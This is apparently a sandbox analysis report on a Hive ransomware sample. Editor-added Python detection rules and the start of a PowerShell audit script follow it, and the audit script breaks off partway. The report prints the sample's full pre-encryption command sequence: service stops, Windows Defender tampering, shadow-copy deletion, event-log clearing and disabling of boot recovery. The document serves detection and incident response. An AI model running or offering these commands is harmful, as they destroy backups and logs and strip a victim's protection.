Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2600 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2016 wrote to memory of 2084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 2084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2016 wrote to memory of 2084 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2520 wrote to memory of 2924 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2520 wrote to memory of 2924 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2520 wrote to memory of 2924 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2596 wrote to memory of 2272 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2596 wrote to memory of 2272 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2596 wrote to memory of 2272 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2480 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2480 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2480 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2480 wrote to memory of 2876 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2896 wrote to memory of 2908 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2896 wrote to memory of 2908 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2896 wrote to memory of 2908 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 3044 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 3044 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3044 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3044 wrote to memory of 2788 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2752 wrote to memory of 2856 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2752 wrote to memory of 2856 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2752 wrote to memory of 2856 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2600 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\net.exe
PID 2840 wrote to memory of 2468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2840 wrote to memory of 2468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2840 wrote to memory of 2468 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2600 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 2636 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe
PID 2600 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\system32\sc.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

C:\Windows\system32\net.exe

net.exe stop "NetMsmqActivator" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\system32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\system32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\system32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\system32\net.exe

net.exe stop "UI0Detect" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\system32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\system32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\system32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\system32\sc.exe

sc.exe config "NetMsmqActivator" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\system32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true
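
The Processes listing above is the whole pre-encryption routine in the order the sample runs it: stop and disable backup-related services, strip Defender through policy keys, service Start values, scheduled tasks and Set-MpPreference, delete shadow copies, clear the event logs, and turn off boot recovery. The block below is an added example by the editor, not part of the sandbox report and not any product's rule set: it classifies raw process command lines into those steps, maps each to the ATT&CK technique it implements, and flags a batch (one process tree's children) once it spans several techniques. The rule names, the technique mapping and the threshold are the editor's choices; SAMPLE_CMDLINES is transcribed from the listing above.

```python
"""Classify Windows process command lines for the pre-encryption pattern this
report shows: backup/security service stops, Defender tampering, shadow-copy
deletion, event-log clearing and boot-recovery changes.

Added example by the editor, not part of the sandbox report and not a product
rule set.  Rule names, technique mapping and the alert threshold are the
editor's choices; SAMPLE_CMDLINES is transcribed from the Processes listing.
"""
import re
from collections import Counter

# (ATT&CK technique, label, regex).  Group 1, where present, is the detail reported.
RULES = [
    ("T1489", "service stopped via net",
     re.compile(r'^(?:\S*\\)?net1?(?:\.exe)?\s+stop\s+"?([^"\s]+)"?', re.I)),
    ("T1489", "service disabled via sc",
     re.compile(r'^(?:\S*\\)?sc(?:\.exe)?\s+config\s+"?([^"\s]+)"?\s+start=\s*disabled', re.I)),
    ("T1562.001", "Defender policy key written",
     re.compile(r'reg(?:\.exe)?\s+(?:add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender[^"]*"'
                r'(?:\s+/v\s+"?(\w+)"?)?', re.I)),
    ("T1562.001", "Defender service/driver set to Start=4",
     re.compile(r'reg(?:\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\'
                r'(WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"\s+/v\s+"?Start"?.*/d\s+"?4"?(?:\s|$)', re.I)),
    ("T1562.006", "Defender ETW autologger turned off",
     re.compile(r'reg(?:\.exe)?\s+add\s+"HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\(Defender\w+)"'
                r'\s+/v\s+"?Start"?.*/d\s+"?0"?(?:\s|$)', re.I)),
    ("T1562.001", "Defender scheduled task disabled",
     re.compile(r'schtasks(?:\.exe)?\s+/Change\s+/TN\s+"([^"]*(?:Windows Defender|ExploitGuard)[^"]*)"\s+/Disable', re.I)),
    ("T1562.001", "Defender definitions removed",
     re.compile(r'MpCmdRun(?:\.exe)?"?\s+(-RemoveDefinitions)', re.I)),
    ("T1562.001", "Defender disabled via Set-MpPreference",
     re.compile(r'Set-MpPreference\s+(-Disable\w+)\s+\$true', re.I)),
    ("T1490", "shadow copies deleted",
     re.compile(r'((?:vssadmin(?:\.exe)?\s+delete\s+shadows)|(?:wmic(?:\.exe)?\s+shadowcopy\s+delete))', re.I)),
    ("T1490", "boot recovery disabled",
     re.compile(r'bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)', re.I)),
    ("T1070.001", "event log cleared",
     re.compile(r'wevtutil(?:\.exe)?\s+cl\s+(\w+)', re.I)),
]


def classify(cmdline):
    """Return every (technique, label, detail) the command line matches."""
    hits = []
    for technique, label, rx in RULES:
        m = rx.search(cmdline)
        if m:
            detail = next((g for g in m.groups() if g), "")
            hits.append((technique, label, detail))
    return hits


def summarize(cmdlines):
    """Classify a batch, e.g. one process tree's children in start order.

    Returns (Counter technique -> hits, list of (technique, label, detail, cmdline)).
    """
    findings = [(t, l, d, line) for line in cmdlines for t, l, d in classify(line)]
    return Counter(t for t, _, _, _ in findings), findings


# Distinct techniques one tree must touch before raising; 3 is the editor's
# starting point, tune it against your own telemetry.
PRECURSOR_THRESHOLD = 3


def is_ransomware_precursor(counts):
    return len(counts) >= PRECURSOR_THRESHOLD


# Transcribed from the Processes listing (behavioral1).  The last line is the
# sample's own launch and should produce no hit.
SAMPLE_CMDLINES = [
    r'net.exe stop "VSS" /y',
    r'C:\Windows\system32\net1 stop "wbengine" /y',
    r'sc.exe config "SDRSVC" start= disabled',
    r'reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    r'vssadmin.exe delete shadows /all /quiet',
    r'wmic.exe shadowcopy delete',
    r'wevtutil.exe cl security',
    r'bcdedit.exe /set {default} recoveryenabled no',
    r'"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"',
]

if __name__ == "__main__":
    counts, findings = summarize(SAMPLE_CMDLINES)
    for technique, label, detail, line in findings:
        print(f"{technique:<10} {label:<40} {detail:<30} {line}")
    print("techniques:", dict(counts), "precursor:", is_ransomware_precursor(counts))
```

Command-line regexes are the brittle part: the same effect can be had through the Service Control Manager API, WMI or the VSS COM interface (the report's "Uses Volume Shadow Copy service COM API" signature is exactly that path), so treat these as one signal and correlate on the parent process, which here is the unsigned executable in %TEMP% for every one of these children.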

Network

N/A

Files

memory/1796-7-0x000000001B670000-0x000000001B952000-memory.dmp

memory/1796-8-0x0000000002350000-0x0000000002358000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8475082a9d89524049c6dde60cc961db
SHA1 8dc4c9fd3f006740eb7a56ef8046fb56bee3dee7
SHA256 b8a467b931a33241b57beaeb6f6b4938ff76e69e9f3b71dbd3734ca0108323dc
SHA512 edbd4942d7f65a7e772d2895556ff2af74740226620bafa7103bbf4f6f362af6a93c8c506ffc39e2d680ae1aed6a024fcc29ba9fce4e8f3b4b3c0f33fb5a3a32

memory/2908-14-0x000000001B610000-0x000000001B8F2000-memory.dmp

memory/2908-15-0x00000000028F0000-0x00000000028F8000-memory.dmp

C:\Program Files\phLK_HOW_TO_DECRYPT.txt

MD5 7c7498625660600d7277d186038c05fa
SHA1 144ea5eccf0824e9c30681f64c25224753886533
SHA256 1da21b2c48b5e60b2e6ced94b990c73a0644fc147cc13b38c022a9f1c058ad3c
SHA512 32ee4b3ba5a1c86ee47be70428204af3f30f865eba33693a235dd7c6ae51d33369b4a486ee41e837c8fbe117edf54ba0cd01b1535a369c14683ca833768d4e92

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-05 04:29

Reported

2024-12-05 04:32

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

Signatures

Disables service(s)

evasion execution

Hive

ransomware hive

Hive family

hive

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\SYSTEM32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
N/A N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
N/A N/A C:\Windows\SYSTEM32\wevtutil.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A
N/A N/A C:\Windows\SYSTEM32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Security services

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" C:\Windows\SYSTEM32\reg.exe N/A
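
The registry indicators in the three tables above are what a responder needs to read back on a suspect host. The following script is an added example by the editor, not part of the sandbox report: it checks the policy values, service Start types, ETW autologgers and scheduled tasks that this sample changes (names and values taken from the report) and lists whatever still matches the tampered state. It deliberately restores nothing: the correct Start values differ by Windows build, and Defender's Tamper Protection has to be back on before a fix will hold.

```powershell
# Added example by the editor, not from the sandbox report.  Run elevated on the
# suspect host.  Key, value and task names are the ones the report lists.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

# registry key -> @{ value name = the value the sample writes }
$TamperedPolicy = @{
    "$PolicyRoot" = @{ DisableAntiSpyware = 1; DisableAntiVirus = 1 }
    "$PolicyRoot\Real-Time Protection" = @{
        DisableBehaviorMonitoring   = 1
        DisableIOAVProtection       = 1
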